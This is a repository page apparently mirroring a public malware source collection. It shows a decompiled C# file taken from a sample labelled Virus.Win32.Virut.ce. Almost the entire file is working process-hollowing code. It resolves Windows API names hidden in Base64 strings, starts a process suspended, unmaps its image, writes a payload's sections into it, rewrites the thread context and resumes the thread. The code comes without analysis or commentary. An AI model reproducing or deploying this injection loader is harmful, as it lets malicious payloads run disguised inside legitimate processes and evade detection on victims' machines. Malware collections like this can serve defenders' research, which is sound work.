ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 09:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Virus/Win32/V/Virus.Win32.Virut.ce-3d2414f8b1eab949c1137dfaf70dd34b31e860b5d02b356b1d3a07a2b6a42731/Jungle.cs

140 lines
7.9 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Jungle
// Assembly: 123, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 3E1AEEED-3C8F-4FD4-B5E3-3EE641855491
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Virut.ce-3d2414f8b1eab949c1137dfaf70dd34b31e860b5d02b356b1d3a07a2b6a42731.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.InteropServices;
using System.Text;
[StandardModule]
internal sealed class Jungle
{
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr handle, [MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
public static T uaudtkjgyirfbxgkwnan<T>(string name, string method) => (T) Marshal.GetDelegateForFunctionPointer(Jungle.GetProcAddress(Jungle.LoadLibraryA(ref name), ref method), typeof (T));
public static bool yglgwgdiliknhk(byte[] uqgycnjiknhkagfbjqd, string pzxbickcbxkqrrbb)
{
Jungle.qrcfkrbqgnvqowkotazx qrcfkrbqgnvqowkotazx = Jungle.uaudtkjgyirfbxgkwnan<Jungle.qrcfkrbqgnvqowkotazx>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("Q3JlYXRlUHJvY2Vzc0E=")));
Jungle.rcucvabyilfqtsczprb rcucvabyilfqtsczprb = Jungle.uaudtkjgyirfbxgkwnan<Jungle.rcucvabyilfqtsczprb>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("R2V0VGhyZWFkQ29udGV4dA==")));
Jungle.tovdnpeketcxszjndiwn tovdnpeketcxszjndiwn = Jungle.uaudtkjgyirfbxgkwnan<Jungle.tovdnpeketcxszjndiwn>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVhZFByb2Nlc3NNZW1vcnk=")));
Jungle.gfrsbdrwpxxdchnzcuu gfrsbdrwpxxdchnzcuu = Jungle.uaudtkjgyirfbxgkwnan<Jungle.gfrsbdrwpxxdchnzcuu>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("VmlydHVhbEFsbG9jRXg=")));
Jungle.orpuhtusqcaecvhbpgk orpuhtusqcaecvhbpgk = Jungle.uaudtkjgyirfbxgkwnan<Jungle.orpuhtusqcaecvhbpgk>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("V3JpdGVQcm9jZXNzTWVtb3J5")));
Jungle.fbiwwfvcqkvzpejryqq fbiwwfvcqkvzpejryqq = Jungle.uaudtkjgyirfbxgkwnan<Jungle.fbiwwfvcqkvzpejryqq>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2V0VGhyZWFkQ29udGV4dA==")));
Jungle.qwcbhkowiggklhqxcez qwcbhkowiggklhqxcez = Jungle.uaudtkjgyirfbxgkwnan<Jungle.qwcbhkowiggklhqxcez>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVzdW1lVGhyZWFk")));
Jungle.gocngjjzjswdligx gocngjjzjswdligx = Jungle.uaudtkjgyirfbxgkwnan<Jungle.gocngjjzjswdligx>(Encoding.UTF8.GetString(Convert.FromBase64String("bnRkbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("WndVbm1hcFZpZXdPZlNlY3Rpb24=")));
bool flag;
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] wjqhztdqqfvihdnejqf = new IntPtr[4];
byte[] bezzveiceppbdtpjvgvr = new byte[68];
int int32_1 = BitConverter.ToInt32(uqgycnjiknhkagfbjqd, 60);
int int16 = (int) BitConverter.ToInt16(uqgycnjiknhkagfbjqd, checked (int32_1 + 6));
IntPtr unexaspqvfrqgeiu = new IntPtr(BitConverter.ToInt32(uqgycnjiknhkagfbjqd, checked (int32_1 + 84)));
if (qrcfkrbqgnvqowkotazx((string) null, new StringBuilder(pzxbickcbxkqrrbb), zero1, zero1, false, 4, zero1, (string) null, bezzveiceppbdtpjvgvr, wjqhztdqqfvihdnejqf))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (rcucvabyilfqtsczprb(wjqhztdqqfvihdnejqf[1], numArray1))
{
IntPtr tkgpprxflwbvtnkit = new IntPtr(checked ((long) numArray1[41] + 8L));
IntPtr zero2 = IntPtr.Zero;
IntPtr xjyoeulnvhdoizzfvt = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (tovdnpeketcxszjndiwn(wjqhztdqqfvihdnejqf[0], tkgpprxflwbvtnkit, ref zero2, (int) xjyoeulnvhdoizzfvt, ref zero3) && gocngjjzjswdligx(wjqhztdqqfvihdnejqf[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(uqgycnjiknhkagfbjqd, checked (int32_1 + 52)));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(uqgycnjiknhkagfbjqd, checked (int32_1 + 80)));
IntPtr vtxceuzwsgnhcrkbsfrh = gfrsbdrwpxxdchnzcuu(wjqhztdqqfvihdnejqf[0], num1, num2, 12288, 64);
int int32_2 = vtxceuzwsgnhcrkbsfrh.ToInt32();
int dxuexfagacgrbvxohsh;
int num3 = orpuhtusqcaecvhbpgk(wjqhztdqqfvihdnejqf[0], vtxceuzwsgnhcrkbsfrh, uqgycnjiknhkagfbjqd, checked ((uint) (int) unexaspqvfrqgeiu), dxuexfagacgrbvxohsh) ? 1 : 0;
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) uqgycnjiknhkagfbjqd, checked (int32_1 + 248 + num5 * 40), (Array) dst, 0, 40);
byte[] numArray2 = new byte[checked (dst[4] - 1 + 1)];
Buffer.BlockCopy((Array) uqgycnjiknhkagfbjqd, dst[5], (Array) numArray2, 0, numArray2.Length);
num2 = new IntPtr(checked (int32_2 + dst[3]));
num1 = new IntPtr(numArray2.Length);
int num6 = orpuhtusqcaecvhbpgk(wjqhztdqqfvihdnejqf[0], num2, numArray2, checked ((uint) (int) num1), dxuexfagacgrbvxohsh) ? 1 : 0;
checked { ++num5; }
}
num2 = new IntPtr(checked ((long) numArray1[41] + 8L));
num1 = new IntPtr(4);
int num7 = orpuhtusqcaecvhbpgk(wjqhztdqqfvihdnejqf[0], num2, BitConverter.GetBytes(vtxceuzwsgnhcrkbsfrh.ToInt32()), checked ((uint) (int) num1), dxuexfagacgrbvxohsh) ? 1 : 0;
numArray1[44] = checked ((uint) (vtxceuzwsgnhcrkbsfrh.ToInt32() + BitConverter.ToInt32(uqgycnjiknhkagfbjqd, int32_1 + 40)));
int num8 = fbiwwfvcqkvzpejryqq(wjqhztdqqfvihdnejqf[1], numArray1) ? 1 : 0;
}
}
int num = (int) qwcbhkowiggklhqxcez(wjqhztdqqfvihdnejqf[1]);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
flag = false;
ProjectData.ClearProjectError();
goto label_11;
}
return true;
label_11:
return flag;
}
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool qrcfkrbqgnvqowkotazx(
string vqhgnxhvtgaixrkr,
StringBuilder sfpleudarlvstvphxd,
IntPtr opceqaenbxpkoyqjrx,
IntPtr yletcelaqjwjnjixt,
[MarshalAs(UnmanagedType.Bool)] bool soonufgywgkruuxdkj,
int zqquneivrpwqncwjs,
IntPtr ydfgwwtlcaycdbjgbgse,
string vbjsaqfkuthodbrjh,
byte[] bezzveiceppbdtpjvgvr,
IntPtr[] wjqhztdqqfvihdnejqf);
public delegate bool orpuhtusqcaecvhbpgk(
IntPtr skxaxwzisjyqiflcqjtz,
IntPtr vtxceuzwsgnhcrkbsfrh,
byte[] hbqpinezvrptngfqfkx,
uint unexaspqvfrqgeiu,
int dxuexfagacgrbvxohsh);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool tovdnpeketcxszjndiwn(
IntPtr yndoerzhrcoyfexh,
IntPtr tkgpprxflwbvtnkit,
ref IntPtr gajudtehsfbihyjgxlby,
int xjyoeulnvhdoizzfvt,
ref IntPtr iljuhsatzgrbpaaylc);
public delegate IntPtr gfrsbdrwpxxdchnzcuu(
IntPtr iqsebovyqdhwqbpfs,
IntPtr xdiiqrxtbnwjzyurvdj,
IntPtr xzohxargiyhzpnsovq,
int oiypvloixyvqvvbn,
int tksgnzvtpxizobuvsi);
public delegate uint gocngjjzjswdligx(IntPtr rskufyftnnrxoggv, IntPtr pjplyockxlgiyqsd);
public delegate uint qwcbhkowiggklhqxcez(IntPtr avojgvabofsqvffsjrpr);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool rcucvabyilfqtsczprb(IntPtr fvtookancwfyduva, uint[] hjvyxexshckpfufon);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool fbiwwfvcqkvzpejryqq(IntPtr jefplkrbcsdjqydnwepz, uint[] ehlgzpcblholqlxyux);
}
Reference in New Issue Copy Permalink